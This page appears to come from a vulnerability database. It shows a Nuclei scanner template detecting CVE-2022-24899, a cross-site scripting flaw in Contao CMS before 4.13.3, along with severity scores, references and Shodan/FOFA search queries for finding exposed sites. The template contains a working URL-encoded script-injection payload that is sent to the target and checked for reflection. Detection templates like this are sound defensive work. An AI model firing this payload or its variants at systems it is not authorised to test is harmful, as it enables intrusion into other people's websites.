Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-24899
HistoryJun 18, 2022 - 6:50 p.m.

Contao <4.13.3 - Cross-Site Scripting

2022-06-1818:50:43
ProjectDiscovery
github.com
8

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

6.1 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

71.6%

Contao prior to 4.13.3 contains a cross-site scripting vulnerability.  It is possible to inject arbitrary JavaScript code into the canonical tag.
id: CVE-2022-24899

info:
  name: Contao <4.13.3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Contao prior to 4.13.3 contains a cross-site scripting vulnerability.  It is possible to inject arbitrary JavaScript code into the canonical tag.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: As a workaround, users may disable canonical tags in the root page settings.
  reference:
    - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
    - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24899
    - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
    - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-24899
    cwe-id: CWE-79
    epss-score: 0.00342
    epss-percentile: 0.70926
    cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: contao
    product: contao
    shodan-query:
      - title:"Contao"
      - http.title:"contao"
      - http.html:"contao open source cms"
      - cpe:"cpe:2.3:a:contao:contao"
    fofa-query:
      - body="contao open source cms"
      - title="contao"
    google-query: intitle:"contao"
  tags: cve,cve2022,contao,xss,huntr

http:
  - method: GET
    path:
      - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - '"Not authenticated"'
        condition: and

      - type: word
        part: header
        words:
          - text/html
# digest: 4b0a00483046022100a5b324c92b0c8deaee51afc9f3e11d001bdd71722f0fdc1611f2e943a1b27450022100a04c5f7a7f3f6638a11698146c51d16668f122c1cd38487319db4c95f2d3ef80:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

6.1 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

71.6%